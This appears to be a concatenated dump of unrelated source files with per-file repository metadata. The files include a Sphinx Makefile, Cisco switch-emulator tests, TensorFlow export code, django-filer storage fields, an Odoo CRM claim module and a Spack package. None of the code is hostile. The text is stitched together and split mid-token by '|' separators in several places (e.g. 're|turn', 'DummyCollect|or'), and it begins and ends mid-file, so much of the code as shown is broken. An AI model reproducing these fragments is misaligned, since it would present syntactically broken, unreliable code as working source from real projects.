MAKEFILE = '''\
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d %(rbuilddir)s/doctrees $(PAPEROPT_$(PAPER)) \
$(SPHINXOPTS) %(rsrcdir)s
.PHONY: help clean html web pickle htmlhelp latex changes linkcheck
help:
\t@echo "Please use \\`make <target>' where <target> is one of"
\t@echo " html to make standalone HTML files"
\t@echo " pickle to make pickle files (usable by e.g. sphinx-web)"
\t@echo " htmlhelp to make HTML files and a HTML help project"
\t@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
\t@echo " changes to make an overview over all changed/added/deprecated items"
\t@echo " linkcheck to check all external links for integrity"
clean:
\t-rm -rf %(rbuilddir)s/*
html:
\tmkdir -p %(rbuilddir)s/html %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) %(rbuilddir)s/html
\t@echo
\t@echo "Build finished. The HTML pages are in %(rbuilddir)s/html."
pickle:
\tmkdir -p %(rbuilddir)s/pickle %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) %(rbuilddir)s/pickle
\t@echo
\t@echo "Build finished; now you can process the pickle files or run"
\t@echo " sphinx-web %(rbuilddir)s/pickle"
\t@echo "to start the sphinx-web server."
web: pickle
htmlhelp:
\tmkdir -p %(rbuilddir)s/htmlhelp %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) %(rbuilddir)s/htmlhelp
\t@echo
\t@echo "Buil
|
internap/fake-switches
|
tests/cisco/test_cisco_switch_protocol.py
|
Python
|
apache-2.0
| 58,284
| 0.002316
|
# Copyright 2015-2016 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from tests.cisco import enable, create_interface_vlan, configuring, configuring_interface_vlan, \
assert_interface_configuration, remove_vlan, create_vlan, set_interface_on_vlan, configuring_interface, \
revert_switchport_mode_access, create_port_channel_interface, configuring_port_channel
from tests.util.protocol_util import SshTester, TelnetTester, with_protocol, ProtocolTest
class TestCiscoSwitchProtocol(ProtocolTest):
__test__ = False
test_switch = "cisco"
@with_protocol
def test_enable_command_requires_a_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
@with_protocol
def test_wrong_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("hello_world")
t.readln("% Access denied")
t.readln("")
t.read("my_switch>")
@with_protocol
def test_no_password_works_for_legacy_reasons(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("")
t.read("my_switch#")
@with_protocol
def test_exiting_loses_the_connection(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
t.write("exit")
t.read_eof()
@with_protocol
def test_no_such_command_return_to_prompt(self, t):
enable(t)
t.write("shizzle")
t.readln("No such command : shizzle")
t.read("my_switch#")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_failing(self, t, read_tftp):
read_tftp.side_effect = Exception("Stuff")
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write("gneh")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Error opening tftp://1.2.3.4/my-file (Timed out)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_success(self, t, read_tftp):
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write_raw("\r")
t.wait_for("\r\n")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Done (or some official message...)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
def test_command_show_run_int_vlan_empty(self, t):
enable(t)
t.write("terminal length 0")
t.read("my_switch#")
t.write("show run vlan 120")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_command_add_vlan(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan 123")
t.read("my_switch(config-vlan)#")
t.write("name shizzle")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
t.write("show run vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("!")
t.readln("vlan 123")
t.readln(" name shizzle")
t.readln("end")
t.readln("")
t.read("my_switch#")
remove_vlan(t, "123")
t.write("show running-config vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.read("")
@with_protocol
def test_command_assign_access_vlan_to_port(self, t):
enable(t)
create_vlan(t, "123")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport access vlan 123",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport access vlan")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport mode access")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
"end"])
remove_vlan(t, "123")
@with_protocol
def test_show_vlan_brief(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan brief")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- -------------------------------- --------- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.read("my_switch#")
revert_switchport_mode_access(t, "FastEthernet0/1")
remove_vlan(t, "123")
remove_vlan(t, "2222")
remove_vlan(t, "3333")
@with_protocol
def test_show_vlan(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- ----------------
|
---------------- -----
|
---- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.readln("")
t.readln("VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2")
t.readln("---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------")
t.readln("1 enet 100001 1500 - - - - - 0 0")
t.readln("123 enet 100123 1500 - - - - - 0 0")
|
cloudera/hue
|
desktop/core/ext-py/pytest-4.6.11/doc/en/example/py2py3/conftest.py
|
Python
|
apache-2.0
| 348
| 0
|
# -*- coding: utf-8 -*-
import sys
import pytest
py3 = sys.version_info[0] >= 3
class DummyCollector(pytest.collect.File):
def collect(self):
re
|
turn []
def pytest_pycollect_makemodule(path, parent):
bn = path.basename
if "py3" in bn and not py3 or ("py2" in bn and py3):
return DummyCollect
|
or(path, parent=parent)
|
dyoung418/tensorflow
|
tensorflow/python/estimator/export/export.py
|
Python
|
apache-2.0
| 14,219
| 0.005767
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configuration and utilities for receiving inputs at serving time."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import time
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.util import compat
_SINGLE_FEATURE_DEFAULT_NAME = 'feature'
_SINGLE_RECEIVER_DEFAULT_NAME = 'input'
class ServingInputReceiver(collections.namedtuple(
'ServingInputReceiver',
['features', 'receiver_tensors', 'receiver_tensors_alternatives'])):
"""A return type for a serving_input_receiver_fn.
The expected return values are:
features: A `Tensor`, `SparseTensor`, or dict of string to `Tensor` or
`SparseTensor`, specifying the features to be passed to the model.
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes where this receiver expects to be fed by default. Typically,
this is a single placeholder expecting serialized `tf.Example` protos.
receiver_tensors_alternatives: a dict of string to additional
groups of receiver tensors, each of which may be a `Tensor` or a dict of
string to `Tensor`. These named receiver tensor alternatives generate
additional serving signatures, which may be used to feed inputs at
different points within the input reciever subgraph. A typical usage is
to allow feeding raw feature `Tensor`s *downstream* of the
tf.parse_example() op. Defaults to None.
"""
def __new__(cls, features, receiver_tensors,
receiver_tensors_alternatives=None):
if features is None:
raise ValueError('features must be defined.')
if not isinstance(features, dict):
features = {_SINGLE_FEATURE_DEFAULT_NAME: features}
for name, tensor in features.items():
if not isinstance(name, six.string_types):
raise ValueError('feature keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor))
|
:
raise ValueError(
'feature {} must be a Tensor or SparseTensor.'.format(name))
if r
|
eceiver_tensors is None:
raise ValueError('receiver_tensors must be defined.')
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
for name, tensor in receiver_tensors.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not isinstance(tensor, ops.Tensor):
raise ValueError(
'receiver_tensor {} must be a Tensor.'.format(name))
if receiver_tensors_alternatives is not None:
if not isinstance(receiver_tensors_alternatives, dict):
raise ValueError(
'receiver_tensors_alternatives must be a dict: {}.'.format(
receiver_tensors_alternatives))
for alternative_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
# Updating dict during iteration is OK in this case.
receiver_tensors_alternatives[alternative_name] = (
receiver_tensors_alt)
for name, tensor in receiver_tensors_alt.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'receiver_tensor {} must be a Tensor or SparseTensor.'.format(
name))
return super(ServingInputReceiver, cls).__new__(
cls,
features=features,
receiver_tensors=receiver_tensors,
receiver_tensors_alternatives=receiver_tensors_alternatives)
def build_parsing_serving_input_receiver_fn(feature_spec,
default_batch_size=None):
"""Build a serving_input_receiver_fn expecting fed tf.Examples.
Creates a serving_input_receiver_fn that expects a serialized tf.Example fed
into a string placeholder. The function parses the tf.Example according to
the provided feature_spec, and returns all parsed Tensors as features.
Args:
feature_spec: a dict of string to `VarLenFeature`/`FixedLenFeature`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn suitable for use in serving.
"""
def serving_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = array_ops.placeholder(dtype=dtypes.string,
shape=[default_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = parsing_ops.parse_example(serialized_tf_example, feature_spec)
return ServingInputReceiver(features, receiver_tensors)
return serving_input_receiver_fn
def build_raw_serving_input_receiver_fn(features, default_batch_size=None):
"""Build a serving_input_receiver_fn expecting feature Tensors.
Creates an serving_input_receiver_fn that expects all features to be fed
directly.
Args:
features: a dict of string to `Tensor`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn.
"""
def serving_input_receiver_fn():
"""A serving_input_receiver_fn that expects features to be fed directly."""
receiver_tensors = {}
for name, t in features.items():
shape_list = t.get_shape().as_list()
shape_list[0] = default_batch_size
shape = tensor_shape.TensorShape(shape_list)
# Reuse the feature tensor's op name (t.op.name) for the placeholder,
# excluding the index from the tensor's name (t.name):
# t.name = "%s:%d" % (t.op.name, t._value_index)
receiver_tensors[name] = array_ops.placeholder(
dtype=t.dtype, shape=shape, name=t.op.name)
# TODO(b/34885899): remove the unnecessary copy
# The features provided are simply the placeholders, but we defensively copy
# the dict because it may be mutated.
return ServingInputReceiver(receiver_tensors, receiver_tensors.copy())
return serving_input_receiver_fn
### Below utilities are specific to SavedModel exports.
def build_all_signature_defs(receiver_tensors,
export_outputs,
receiver_tensors_alternatives=None):
"""Build `SignatureDef`s for all export outputs.
|
thorwhalen/ut
|
daf/struct.py
|
Python
|
mit
| 2,689
| 0.003719
|
__author__ = 'thor'
import ut as ms
import pandas as pd
import ut.pcoll.order_conserving
from functools import reduce
class SquareMatrix(object):
def __init__(self, df, index_vars=None, sort=False):
if isinstance(df, SquareMatrix):
self = df.copy()
elif isinstance(df, pd.DataFrame):
self.df = df
self.index_vars = index_vars
self.value_vars = ms.pcoll.order_conserving.setdiff(list(self.df.columns), self.index_vars)
self.df = self.df[self.index_vars + self.value_vars]
else:
raise NotImplementedError("This case hasn't been implemented yet")
if sort:
self.df.sort(columns=self.index_vars, inplace=True)
def copy(self):
return SquareMatrix(df=self.df.copy(), index_vars=self.index_vars)
def transpose(self):
return SquareMatrix(df=self.df, index_vars=[self.index_vars[1], self.index_vars[0]])
def reflexive_mapreduce(self, map_fun, reduce_fun=None, broadcast_functions=True):
df = self.df.merge(self.df, how='inner', left_on=self.index_vars[1
|
],
right_on=self.index_vars[0], suffixes=('', '_y'))
df[self.index_vars[1]] = df[self.index_var
|
s[1] + '_y']
df.drop(labels=[self.index_vars[0] + '_y', self.index_vars[1] + '_y'], axis=1, inplace=True)
if not isinstance(map_fun, dict) and broadcast_functions:
map_fun = dict(list(zip(self.value_vars, [map_fun] * len(self.value_vars))))
for k, v in map_fun.items():
df[k] = v(df[k], df[k + '_y'])
df.drop(labels=[x + '_y' for x in self.value_vars], axis=1, inplace=True)
if not reduce_fun:
reduce_fun = dict()
for k, v in map_fun.items():
reduce_fun[k] = lambda x: reduce(v, x)
elif not isinstance(reduce_fun, dict) and broadcast_functions:
reduce_fun = dict(list(zip(self.value_vars, [reduce_fun] * len(self.value_vars))))
df = df.groupby(self.index_vars).agg(reduce_fun).reset_index(drop=False)
return SquareMatrix(df=df, index_vars=self.index_vars)
def reverse_indices(self):
return [self.index_vars[1], self.index_vars[0]]
def sort(self, **kwargs):
kwargs = dict({'columns': self.index_vars}, **kwargs)
sm = self.copy()
sm.df = sm.df.sort(**kwargs)
return sm
def __str__(self):
return self.df.__str__()
def __repr__(self):
return self.df.set_index(self.index_vars).__str__()
def head(self, num_of_rows=5):
return self.df.head(num_of_rows)
def tail(self, num_of_rows=5):
return self.df.tail(num_of_rows)
|
WebArchivCZ/Seeder
|
Seeder/harvests/scheduler.py
|
Python
|
mit
| 1,219
| 0.00082
|
from datetime import date, timedelta
INITIAL_OFFSET = timedelta(days=5)
class IntervalException(Exception):
"""
Exception to be raises when interval is behaving
weirdly - as not an interval
"""
def get_dates_for_timedelta(interval_delta, start=None, stop=None,
skip_weekend=False):
"""
For given interval_delta it will return list of dates starting from
``starting date``
:param interval_delta: interval_delta instance
:type interval_delta: datetime.timedelta
:param start: starting point of the inter
|
val
:type start: date
:param stop: when to stop
:param skip_weekend: don't place dates at weekends
:return: [datetime objects]
"""
if start is None:
start = date.today()
if stop is None:
stop = start + timedelta(days=365)
dates = [start]
while dates[-1] + interval_delta <= stop:
increased_date = dates[-1] + interval_delta
if skip_weekend and increased_date.isoweekday() > 5:
increased_date += timedelta(days=2)
|
if increased_date == dates[-1]:
raise IntervalException(interval_delta)
dates.append(increased_date)
return dates
|
jakob-o/django-filer
|
filer/fields/multistorage_file.py
|
Python
|
bsd-3-clause
| 5,617
| 0.001068
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import base64
import hashlib
import warnings
from io import BytesIO
from django.core.files.base import ContentFile
from django.utils import six
from easy_thumbnails import fields as easy_thumbnails_fields
from easy_thumbnails import files as easy_thumbnails_files
from .. import settings as filer_settings
from ..utils.filer_easy_thumbnails import ThumbnailerNameMixin
STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_STORAGE,
}
THUMBNAIL_STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE,
}
THUMBNAIL_OPTIONS = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS,
}
def generate_filename_multistorage(instance, filename):
if instance.is_public:
upload_to = filer_settings.FILER_PUBLICMEDIA_UPLOAD_TO
else:
upload_to = filer_settings.FILER_PRIVATEMEDIA_UPLOAD_TO
if callable(upload_to):
return upload_to(instance, filename)
else:
return upload_to
class MultiStorageFieldFile(ThumbnailerNameMixin,
easy_thumbnails_files.Thumbnaile
|
rFieldFile):
def __init__(self, instance, field, name):
"""
This is a little weird, but I couldn't find a better solution.
Thumbnailer.__init__ is called first for proper object inizialization.
|
Then we override some attributes defined at runtime with properties.
We cannot simply call super().__init__ because filer Field objects
doesn't have a storage attribute.
"""
easy_thumbnails_files.Thumbnailer.__init__(self, None, name)
self.instance = instance
self.field = field
self._committed = True
self.storages = self.field.storages
self.thumbnail_storages = self.field.thumbnail_storages
self.thumbnail_options = self.field.thumbnail_options
self.storage = self._storage
self.source_storage = self._source_storage
self.thumbnail_storage = self._thumbnail_storage
self.thumbnail_basedir = self._thumbnail_base_dir
@property
def _storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _source_storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _thumbnail_storage(self):
if self.instance.is_public:
return self.thumbnail_storages['public']
else:
return self.thumbnail_storages['private']
@property
def _thumbnail_base_dir(self):
if self.instance.is_public:
return self.thumbnail_options['public'].get('base_dir', '')
else:
return self.thumbnail_options['private'].get('base_dir', '')
def save(self, name, content, save=True):
content.seek(0) # Ensure we upload the whole file
super(MultiStorageFieldFile, self).save(name, content, save)
class MultiStorageFileField(easy_thumbnails_fields.ThumbnailerField):
attr_class = MultiStorageFieldFile
def __init__(self, verbose_name=None, name=None,
storages=None, thumbnail_storages=None, thumbnail_options=None, **kwargs):
if 'upload_to' in kwargs: # pragma: no cover
upload_to = kwargs.pop("upload_to")
if upload_to != generate_filename_multistorage:
warnings.warn("MultiStorageFileField can handle only File objects;"
"%s passed" % upload_to, SyntaxWarning)
self.storages = storages or STORAGES
self.thumbnail_storages = thumbnail_storages or THUMBNAIL_STORAGES
self.thumbnail_options = thumbnail_options or THUMBNAIL_OPTIONS
super(easy_thumbnails_fields.ThumbnailerField, self).__init__(
verbose_name=verbose_name, name=name,
upload_to=generate_filename_multistorage,
storage=None, **kwargs)
def value_to_string(self, obj):
value = super(MultiStorageFileField, self).value_to_string(obj)
if not filer_settings.FILER_DUMP_PAYLOAD:
return value
try:
payload_file = BytesIO(self.storage.open(value).read())
sha = hashlib.sha1()
sha.update(payload_file.read())
if sha.hexdigest() != obj.sha1:
warnings.warn('The checksum for "%s" diverges. Check for file consistency!' % obj.original_filename)
payload_file.seek(0)
encoded_string = base64.b64encode(payload_file.read()).decode('utf-8')
return value, encoded_string
except IOError:
warnings.warn('The payload for "%s" is missing. No such file on disk: %s!' % (obj.original_filename, self.storage.location))
return value
def to_python(self, value):
if isinstance(value, list) and len(value) == 2 and isinstance(value[0], six.text_type):
filename, payload = value
try:
payload = base64.b64decode(payload)
except TypeError:
pass
else:
if self.storage.exists(filename):
self.storage.delete(filename)
self.storage.save(filename, ContentFile(payload))
return filename
return value
|
pocketone/django-shoppy
|
shoppy/util/randomuserid.py
|
Python
|
bsd-3-clause
| 499
| 0.012024
|
import string
from random import
|
choice
from django.contrib.auth.models import User
def get_random_id():
valid_id = False
test_name = 'EMPTY'
while valid_id is False:
s1 = ''.join([choice(string.ascii_uppercase) for i in range(2)])
s2 = ''
|
.join([choice(string.digits) for i in range(8)])
test_name = u'%s%s' % (s1,s2)
try:
User.objects.get(username=test_name)
except:
valid_id = True
return test_name
|
blancoamor/crm_rma_blancoamor
|
crm_rma_blancoamor.py
|
Python
|
agpl-3.0
| 14,539
| 0.008941
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import models, fields, api
from openerp.addons.crm import crm
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
from openerp.tools import html2plaintext
from datetime import datetime, timedelta
import logging
_logger = logging.getLogger(__name__)
AVAILABLE_ACTIONS = [
('correction','Corrective Action'),
('prevention','Preventive Action'),
('replace','Replace Action'), # New option
('discard','Discard Action'), # New option
]
class crm_claim(osv.osv):
_name = "crm.claim"
_inherit = "crm.claim"
_columns = {
'origin': fields.char('Origin',size=30,readonly=True),
'products_id': fields.many2many('product.product', 'crm_claim_products', 'crm_claim_id', 'product_id', 'Productos', track_visibility='onchange'),
'has_check_solution': fields.boolean('has check soluction',readonly=True),
'type_action': fields.selection(AVAILABLE_ACTIONS, 'Action Type',readonly=True), # Override required and selections
'type_id': fields.many2one('crm.claim.type', 'Type'),
#'product_id' : fields.Many2one('product.product'),
#'ref': fields.reference('Reference', selection=openerp.addons.base.res.res_request.referencable_models),
}
_defaults = {
'origin': lambda self, cr, uid, context: 'self',
}
def create(self, cr, uid, vals, context=None):
if not 'number_id' in vals or vals['number_id'] == '/':
if not 'origin' in vals :
vals['origin'] = 'self'
vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
#vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
return super(crm_claim, self).create(cr, uid, vals, context)
def write(self, cr, uid, ids, vals, context=None):
if 'stage_id' in vals:
clm_stg = self.pool.get('crm.claim.stage')
stage=clm_stg.read(cr, uid, vals['stage_id'], ['user_id','day_to_action_next','action_next','days_to_date_deadline'])
if 'action_next' in stage and stage['action_next']:
vals['action_next']=stage['action_next']
vals['date_action_next']=datetime.today()+t
|
imedelta(days=int(stage['day_to_action_next']))
vals['user_id']=stage['user_id'][0]
if 'days_to_date_deadline' in stage and stage['days_to_date_deadline']:
vals['date_deadli
|
ne']=datetime.today()+timedelta(days=int(stage['days_to_date_deadline']))
return super(crm_claim, self).write(cr, uid, ids, vals, context=context)
def copy(self, cr, uid, _id, default={}, context=None):
default.update({
'number_id': self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'),
})
return super(crm_claim, self).copy(cr, uid, _id, default, context)
crm_claim()
class crm_claim_stage(osv.osv):
_name = "crm.claim.stage"
_inherit = "crm.claim.stage"
_columns = {
'user_id': fields.many2one('res.users', 'Responsible', track_visibility='always'),
'day_to_action_next': fields.integer('Days to next action'),
'action_next': fields.char('Next Action'),
'days_to_date_deadline': fields.char('Date to deadline'),
}
_defaults = {
'day_next_action': lambda self, cr, uid, context: '7',
}
crm_claim_stage()
class crm_claim_type(osv.osv):
""" Type of Claim """
_name = "crm.claim.type"
_description = "Type of Claim"
_columns = {
'name': fields.char('Name', required=True, translate=True),
'parent_id': fields.many2one('crm.claim.type', 'Type of claim', required=False, ondelete='cascade',
help="Claim type."),
}
"""def _find_object_id(self, cr, uid, context=None):
context = context or {}
object_id = context.get('object_id', False)
ids = self.pool.get('ir.model').search(cr, uid, ['|', ('id', '=', object_id), ('model', '=', context.get('object_name', False))])
return ids and ids[0] or False
_defaults = {
'object_id': _find_object_id
}"""
class claim_from_invoice(osv.osv_memory):
_name = 'claim.from.invoice'
_description = 'claim from invoice'
_columns = {
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
}
def claim_from_invoice(self, cr, uid, ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
class view_account_invoice_claims(osv.osv):
_name = "view.account.invoice.claims"
_description = "Claim by account invoice"
_auto = False
_columns = {
'id': fields.integer('ID', readonly=True),
'invoice_id': fields.many2one('account.invoice', 'Invoice'),
'partner_id': fields.many2one('res.partner', 'Partner'),
'number': fields.char('number'),
'name': fields.char('name'),
'claim_id': fields.many2one('crm.claim', 'Claim'),
'crm_claim_name': fields.char('Subject'),
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
#'invoice_line_text_line':fields.function('get_text_lines', store=False,relation='view.account.invoice.claims' ,
# method=True, string='lines',type='char')
'invoice_line_text': fields.char(compute='_get_text_lines' ,store=False, string="Productos"),
}
@api.depends('invoice_line_text','invoice_line')
def _get_text_lines(self):
_logger.info("filoquin ----- self : %r", self)
for record in self:
record.invoice_line_text ='sada'
def prueba(self, cr, uid,ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
_logger.info("filoquin ----- context : %r", context)
def _get_default_warehouse(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
company_id = user.company_id.id
wh_obj = self.pool.get('stock.warehouse')
wh_ids = wh_obj.search(cr, uid,
[('company_id', '=', company_id)],
context=context)
if not wh_ids:
raise orm.except_orm(
_('Error!'),
_('There is no warehouse for the current user\'s company.'))
return wh_ids[0]
def create(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- create : %r", vals)
#newclaim=self.newclaim( cr, uid, [vals['invoice_id']], context=None)
_logger.info("filoquin ----- newclaim : %r", newclaim)
pass
def write(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- write : %r", vals)
pass
def newclaim(self, cr, uid, ids, context=None):
res_invoice_id = ids[0]
claims = self.pool.get('crm.claim').search(cr,uid,
[('invoice_id', '=', res_invoice_id)],
context=context)
if claims :
return
|
krafczyk/spack
|
var/spack/repos/builtin/packages/flang/package.py
|
Python
|
lgpl-2.1
| 3,969
| 0.000756
|
##############################################################################
# Copyright (c) 2017, Los Alamos National Security, LLC
# Produced at the Los Alamos National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Flang(CMakePackage):
"""Flang is a Fortran compiler targeting LLVM."""
homepage = "https://github.com/flang-compiler/flang"
url = "https://github.com/flang-compiler/flang/archive/flang_20180612.tar.gz"
git = "https://github.com/flang-compiler/flang.git"
version('develop', branch='master')
version('20180612', '62284e26214eaaff261a922c67f6878c')
depends_on('llvm@flang-develop', when='@develop')
depends_on('llvm@flang-20180612', when='@20180612 target=x86_64')
# LLVM version specific to OpenPOWER.
depends_on('llvm@flang-ppc64le-20180612', when='@20180612 target=ppc64le')
depends_on('pgmath@develop', when='@develop')
depends_on('pgmath@20180612', when='@20180612')
def cmake_args(self):
options = [
'-DWITH_WERROR=OFF',
'-DCMAKE_C_COMPILER=%s' % os.path.join(
